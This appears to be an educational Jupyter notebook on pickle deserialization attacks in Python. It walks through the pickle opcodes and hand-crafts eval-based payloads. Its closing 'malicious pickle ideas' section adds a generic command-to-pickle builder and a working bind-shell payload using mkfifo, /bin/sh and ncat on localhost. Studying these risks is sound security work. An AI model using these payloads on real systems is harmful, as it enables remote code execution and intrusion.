# Dangerous Pickles

Based on: https://intoli.com/blog/dangerous-pickles/

See also: https://huggingface.co/docs/hub/security-pickle

In [2]:
import pickle

# start with any instance of a Python type
original = { 'a': 0, 'b': [1, 2, 3] }

# turn it into a string
pickled = pickle.dumps(original)

# turn it back into an identical object
identical = pickle.loads(pickled)


Example ```Bomb``` class to be pickle'd

In [4]:
class Bomb:
    def __init__(self, name):
        self.name = name

    def __getstate__(self):
        return self.name

    def __setstate__(self, state):
        self.name = state
        print(f'Bang! From, {self.name}.')

bomb = Bomb('Evan')


The __setstate__() and __getstate__() methods are used by the pickle module to serialize and deserialize classes. You often don’t need to define these yourself because the default implementations will just serialize the instance’s __dict__. As you can see, I’ve defined them explicitly here so that I can sneak in a little surprise for when the Bomb object is deserialized.

In [5]:
import pickle

pickled_bomb = pickle.dumps(bomb, protocol=0)
unpickled_bomb = pickle.loads(pickled_bomb)


Bang! From, Evan.


In [6]:
pickled_bomb

b'ccopy_reg\n_reconstructor\np0\n(c__main__\nBomb\np1\nc__builtin__\nobject\np2\nNtp3\nRp4\nVEvan\np5\nb.'

In [7]:
import pickletools

pickletools.dis(pickled_bomb)


    0: c    GLOBAL     'copy_reg _reconstructor'
   25: p    PUT        0
   28: (    MARK
   29: c        GLOBAL     '__main__ Bomb'
   44: p        PUT        1
   47: c        GLOBAL     '__builtin__ object'
   67: p        PUT        2
   70: N        NONE
   71: t        TUPLE      (MARK at 28)
   72: p    PUT        3
   75: R    REDUCE
   76: p    PUT        4
   79: V    UNICODE    'Evan'
   85: p    PUT        5
   88: b    BUILD
   89: .    STOP
highest protocol among opcodes = 0


In [8]:
pickled_bomb = pickletools.optimize(pickled_bomb)
pickletools.dis(pickled_bomb)


    0: c    GLOBAL     'copy_reg _reconstructor'
   25: (    MARK
   26: c        GLOBAL     '__main__ Bomb'
   41: c        GLOBAL     '__builtin__ object'
   61: N        NONE
   62: t        TUPLE      (MARK at 25)
   63: R    REDUCE
   64: V    UNICODE    'Evan'
   70: b    BUILD
   71: .    STOP
highest protocol among opcodes = 0


## Step 0: emulate memory / stack for pickle machine

In [9]:
# the PM's longterm memory/storage
memo = {}
# the PM's stack, which most opcodes interact with
stack = []

## Step 1: put global object on stack

In [10]:
# Push a global object (module.attr) on the stack.
#  0: c    GLOBAL     'copy_reg _reconstructor'
from copyreg import _reconstructor
stack.append(_reconstructor)

## Step 2: put special ```markobject``` on stack (rep'd with 'MARK')

In [11]:
# Push markobject onto the stack.
# 25: (    MARK
stack.append('MARK')


## Step 3: putting global object on stack - our ```Bomb```

In [12]:
# Push a global object (module.attr) on the stack.
# 26: c        GLOBAL     '__main__ Bomb'
stack.append(Bomb)

## Step 4: setting up global ```object``` from __builtin__

In [13]:
# Push a global object (module.attr) on the stack.
# 41: c        GLOBAL     '__builtin__ object'
stack.append(object)

## Step 5: putting ```NONE``` on stack (???)

In [14]:
# Push None on the stack.
# 61: N        NONE
stack.append(None)

## Step 6: replace everything since ```markobject``` with a tuple

In [15]:
# Build a tuple out of the topmost stack slice, after markobject.
# 62: t        TUPLE      (MARK at 28)
last_mark_index = len(stack) - 1 - stack[::-1].index('MARK')
mark_tuple = tuple(stack[last_mark_index + 1:])
stack = stack[:last_mark_index] + [mark_tuple]

In [None]:
# the stack before the TUPLE operation:
[<function copyreg._reconstructor>, 'MARK', __main__.Bomb, object, None]
# the stack after the TUPLE operation:
[<function copyreg._reconstructor>, (__main__.Bomb, object, None)]

## Step 7: ```REDUCE``` pops last two things off stack

In [16]:
# Push an object built from a callable and an argument tuple.
# 63: R    REDUCE
args = stack.pop()
callable = stack.pop()
stack.append(callable(*args))

## Step 8: plop a Unicode string on the stack

In [17]:
# Push a Python Unicode string object.
# 64: V    UNICODE    'Evan'
stack.append(u'Evan')

## Step 9: ```BUILD``` takes last thing off stack and pushes it to __setstate__()

In [18]:
# Finish building an object, via __setstate__ or dict update.
# 70: b    BUILD
arg = stack.pop()
stack[-1].__setstate__(arg)

Bang! From, Evan.


## Step 10: ```STOP``` means the top of stack is final result

In [19]:
# Stop the unpickling machine.
# 71: .    STOP
unpickled_bomb = stack[-1]

simplified version:

In [9]:
# Instruction 1, where `_reconstructor` was imported
from copyreg import _reconstructor

# Instruction 7, where `_reconstructor` was called
unpickled_bomb = _reconstructor(cls=Bomb, base=object, state=None)
# Instruction 9, where `__setstate__` was called
unpickled_bomb.__setstate__('Evan')

Bang! From, Evan.


ULTRASIMPLIFIED version:

In [10]:
unpickled_bomb = object.__new__(Bomb)
unpickled_bomb.__setstate__('Evan')

Bang! From, Evan.


# Building our own

In [None]:
# add a function to the stack to execute arbitrary python
GLOBAL     '__builtin__ eval'
# mark the start of our args tuple
MARK
    # add the Python code that we want to execute to the stack
    UNICODE    'print("Bang! From, Evan.")'
    # wrap that code into a tuple so it can be parsed by REDUCE
    TUPLE
# call `eval()` with our Python code as an argument
REDUCE
# STOP is required to be valid PM code
STOP


Now to convert this into an actual pickle, we need to replace each opcode with its corresponding ASCII code: c for GLOBAL, ( for MARK, V for UNICODE, t for TUPLE, R for REDUCE, and . for STOP

In [None]:
c__builtin__
eval
(Vprint("Bang! From, Evan.")
tR.

In [11]:
# Run me at home!
# I'm safe, I promise!
pickled_bomb = b'c__builtin__\neval\n(Vprint("Bang! From, Evan.")\ntR.'
pickle.loads(pickled_bomb)

Bang! From, Evan.


# malicious pickle ideas

In [39]:
def command2pickle(command: str):
    return b'c__builtin__\neval\n(V__import__("os").system("' + command.encode() + b'")\ntR.'

### opens a ncat listener that pipes input to bash

Props to the ```ncat``` ```man``` page for this example!

In [9]:
# pickle command builder
# command = input("what bash command do you to pickle in?")
# command = 'nc -l 127.0.0.1 1999 | /bin/sh -i 2>&1'
command = 'rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc -l 127.0.0.1 199\
9 > /tmp/f'
pickled_shell = b'c__builtin__\neval\n(V' + b'__import__("os").system("' \
    + command.encode() + b'")\ntR.'
print(pickled_shell.decode())

c__builtin__
eval
(V__import__("os").system("rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc -l 127.0.0.1 1999 > /tmp/f")
tR.


In [11]:
# works!
pickle.loads(pickled_shell)

0

if you are brave enough to pickle this in on your machine (do not use maliciously! do not use for violations of law or policy!), simply ```nc 127.0.0.1 1999``` and you have a shell on your own machine!